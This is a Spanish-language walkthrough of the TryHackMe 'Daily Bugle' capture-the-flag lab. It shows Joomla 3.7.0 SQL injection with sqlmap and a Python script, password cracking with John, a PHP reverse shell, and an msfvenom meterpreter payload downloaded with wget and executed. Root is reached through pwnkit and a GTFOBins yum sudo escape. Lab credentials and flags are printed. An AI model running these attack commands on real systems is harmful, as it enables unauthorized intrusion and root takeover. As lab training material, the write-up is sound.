Daily Bugle [TryHackMe]
2023-09-03
Introducción
La primera sala dificil del path “Offensive Pentesting¨, con una temática de Spiderman. La sala tiene como objetivo comprometer la máquina y obtener las banderas de usuario y root usando una vulnerabilidad de Joomla y un exploit de escalada de privilegios.
Task 1 - Deploy and compromise the vulnerable machine!
Paso 1
- Pongo la máquina en marcha y accedo a la aplicación web que tiene.
- Escaneo la máquina con un nmap en 2 pasos.
sudo nmap -sS --min-rate 5000 -p- -Pn -v -oN nmap_inicial <IP>
ports=$(cat nmap_inicial | grep '^[0-9]' | cut -d '/' -f1 | xargs | tr ' ' ',')
sudo nmap -p$ports -sC -sV -Pn -oN nmap_final <IP>
- Puertos 22 (OpenSSH 7.4), 80 (Apache httpd 2.4.6 ((CentOS) PHP/5.6.40) y 3306 (mysql).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open mysql MariaDB (unauthorized)
- Escaneo con dirb en busca de directorios en la web.
❯ dirb http://10.10.53.147/ /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Sep 3 09:14:53 2023
URL_BASE: http://10.10.53.147/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.53.147/ ----
==> DIRECTORY: http://10.10.53.147/administrator/
==> DIRECTORY: http://10.10.53.147/bin/
==> DIRECTORY: http://10.10.53.147/cache/
+ http://10.10.53.147/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://10.10.53.147/components/
==> DIRECTORY: http://10.10.53.147/images/
==> DIRECTORY: http://10.10.53.147/includes/
+ http://10.10.53.147/index.php (CODE:200|SIZE:9278)
==> DIRECTORY: http://10.10.53.147/language/
==> DIRECTORY: http://10.10.53.147/layouts/
==> DIRECTORY: http://10.10.53.147/libraries/
==> DIRECTORY: http://10.10.53.147/media/
==> DIRECTORY: http://10.10.53.147/modules/
==> DIRECTORY: http://10.10.53.147/plugins/
+ http://10.10.53.147/robots.txt (CODE:200|SIZE:836)
==> DIRECTORY: http://10.10.53.147/templates/
==> DIRECTORY: http://10.10.53.147/tmp/
---- Entering directory: http://10.10.53.147/administrator/ ----
==> DIRECTORY: http://10.10.53.147/administrator/cache/
==> DIRECTORY: http://10.10.53.147/administrator/components/
==> DIRECTORY: http://10.10.53.147/administrator/help/
==> DIRECTORY: http://10.10.53.147/administrator/includes/
+ http://10.10.53.147/administrator/index.php (CODE:200|SIZE:4843)
==> DIRECTORY: http://10.10.53.147/administrator/language/
==> DIRECTORY: http://10.10.53.147/administrator/logs/
==> DIRECTORY: http://10.10.53.147/administrator/modules/
==> DIRECTORY: http://10.10.53.147/administrator/templates/
---- Entering directory: http://10.10.53.147/bin/ ----
+ http://10.10.53.147/bin/index.html (CODE:200|SIZE:31)
---- Entering directory: http://10.10.53.147/cache/ ----
+ http://10.10.53.147/cache/index.html (CODE:200|SIZE:31)
^C> Testing: http://10.10.53.147/cache/lisence
Paso 2
- Busco un scanner para joomla del tipo wpscan. Encuentro https://github.com/OWASP/joomscan y lo instalo desde repositorio de kali. Compruebo que la versión de Joomla es la 3.7.0
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.10.53.147/administrator/ ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://10.10.53.147/administrator/components
http://10.10.53.147/administrator/modules
http://10.10.53.147/administrator/templates
http://10.10.53.147/administrator/includes
http://10.10.53.147/administrator/language
http://10.10.53.147/administrator/templatesll
- Encuentro varias vulnerabilidades para la versio 3.7 de Joomla.
❯ searchsploit joomla 3.7 -w
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Joomla! 3.7 - SQL Injection | https://www.exploit-db.com/exploits/44227
Joomla! 3.7.0 - 'com_fields' SQL Injection | https://www.exploit-db.com/exploits/42033
Joomla! Component ARI Quiz 3.7.4 - SQL Injection | https://www.exploit-db.com/exploits/46769
Joomla! Component com_realestatemanager 3.7 - SQL Injection | https://www.exploit-db.com/exploits/38445
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | https://www.exploit-db.com/exploits/43488
Joomla! Component J2Store < 3.3.7 - SQL Injection | https://www.exploit-db.com/exploits/46467
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection | https://www.exploit-db.com/exploits/44117
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | https://www.exploit-db.com/exploits/43913
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection | https://www.exploit-db.com/exploits/42589
-------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------
Shellcodes: No Results
- Encuentro un posible exploit en https://www.exploit-db.com/exploits/42033
Paso 3
- Ataco con SQLi usando sqlmap.
sqlmap -u "http://10.10.53.147/administrator/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
- Otra opción es el script https://github.com/incredibleindishell/exploit-code-by-me/tree/43f3976ee02430762bbe02642dc8df82385b7cca/Joomla-SQL-Injection-3.7
- Busca una tercera opcion valida, encuentro el script https://github.com/stefanlucas/Exploit-Joomla
❯ python2 joomblah.py http://10.10.53.147
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user [u'811', u'Super User', u'jonah', u'jonah@tryhackme.com', u'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', u'', u'']
- Extracting sessions from fb9j5_session
- Uso john the ripper con el hash obtenido. Password → spiderman123
❯ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:00:47 DONE (2023-09-03 10:50) 0.02120g/s 994.1p/s 994.1c/s 994.1C/s 060494..setsuna
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Paso 4
- Intento subir fichero php para reverse shell sin exito. Buscando en internet encuentro https://www.hackingarticles.in/joomla-reverse-shell/ asi que modifico un fichero php para lograrlo.
❯ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.14.50.184] from (UNKNOWN) [10.10.53.147] 48678
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:14:22 up 2:06, 0 users, load average: 0.00, 0.03, 0.15
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$
- Estabilizo shell.
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
- En mi equipo, creo un payload con msfvenom para descargarlo en /tmp en la maquina remota.
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.x.x.x LPORT=4444
- En maquina objetivo ejecuto:
wget http://10.x.x.x:8080/shell
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shell'
100%[======================================>] 250 --.-K/s in 0s
2023-09-03 05:18:08 (954 KB/s) - 'shell' saved [250/250]
bash-4.2$ ls
ls
shell
bash-4.2$ chmod +x shell
chmod +x shell
bash-4.2$ ./shell
Paso 5
- Abro metasploit y selecciono multihandler exploit y payload meterpreter/reverse_tcp
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.14.50.184:4444
[*] Sending stage (3045380 bytes) to 10.10.53.147
[*] Meterpreter session 1 opened (10.14.50.184:4444 -> 10.10.53.147:34128) at 2023-09-03 11:22:51 +0200
meterpreter >
- Cargo el modulo local_exploit_suggester y lo ejecuto.
msf6 exploit(multi/handler) > search exploit suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux apache @ 10.10.53.147 10.14.50.184:4444 -> 10.10.53.147:34128 (10.10.53.147)
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.53.147 - Collecting local exploits for x64/linux...
[*] 10.10.53.147 - 186 exploit checks are being tried...
[+] 10.10.53.147 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.53.147 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 10.10.53.147 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.53.147 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 10.10.53.147 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.53.147 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[+] 10.10.53.147 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 10.10.53.147 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
4 exploit/linux/local/ptrace_traceme_pkexec_helper Yes The target appears to be vulnerable.
5 exploit/linux/local/su_login Yes The target appears to be vulnerable.
6 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
7 exploit/linux/local/sudoedit_bypass_priv_esc Yes The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine
- Uso exploit cve_2021_4034_pwnkit_lpe_pkexec
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.tlhznymlpvc
[+] The target is vulnerable.
[*] Writing '/tmp/.adasqfiitd/zraeisswkke/zraeisswkke.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.adasqfiitd
[*] Sending stage (3045380 bytes) to 10.10.53.147
[+] Deleted /tmp/.adasqfiitd/zraeisswkke/zraeisswkke.so
[+] Deleted /tmp/.adasqfiitd/.dnnzjbsapkm
[+] Deleted /tmp/.adasqfiitd
[*] Meterpreter session 2 opened (10. -> 10.10.53.147:34132) at 2023-09-03 11:38:41 +0200
Paso 6
- Obtengo acceso root y busco flags.
meterpreter > getuid
Server username: root
meterpreter > search -f user.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/home/jjameson/user.txt 33 2019-12-16 01:47:48 +0100
meterpreter > search -f root.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
/root/root.txt 33 2019-12-16 01:47:19 +0100
meterpreter > cat /home/jjameson/user.txt
27a260fe3cba712cfdedb1c86d80442e
meterpreter > cat /root/root.txt
eec3d53292b1821868266858d7fa6f79
- La opción que proponía la sala era usar el binario yum, para ello habia que obtener acceslo como usuario local despues de revisar el fichero configuration.php en /var/www/html
meterpreter > cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
- Al logarse con esas credenciales, se buscaría la bandera de usuario y despues buscaría que binario puede ejecutar
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
- En https://gtfobins.github.io/gtfobins/yum/ viene el siguiente exploit:
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
Conclusion
Una sala muy divertida con tématica de Spiderman, mi superhéroe favorito. Esta vez la sala tenía la etiqueta dificil, y la verdad es que he notado el pequeño salto de nivel. Me ha llevado unas 3 horas poder completarla, me encontré varios callejones sin salida con el SQLi de Joomla hasta que di con el script de python. Para conseguir las banderas usé directamente el exploit suggester de metasploit en vez de listar los binarios que podía ejecutar el usuario local (revisando la configuración del site en /var/www/html) y aprovechando el binario /bin/yum para obtener acceso privilegiado como sugiere la sala.